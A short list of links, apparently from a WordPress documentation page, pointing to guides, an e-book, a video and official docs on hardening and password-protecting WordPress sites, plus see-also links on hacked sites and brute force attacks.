- WordPress Security: Cutting Through the BS
- e-Book: Locking Down WordPress
- wpsecure.net has a few guides on how to lock down WordPress
- A Beginner's Guide to Hardening WordPress
- Brad Williams: Lock it Up (Video)
- 21 Ways to Secure Your WordPress Site
- Official docs on how to password protect directories with an .htaccess file
- Simple tutorial on how to password protect the WordPress admin area and fix the 404 error

See Also

- Security FAQ
- FAQ – My site was hacked
- Brute Force Attacks
- WordPress Security Whitepaper


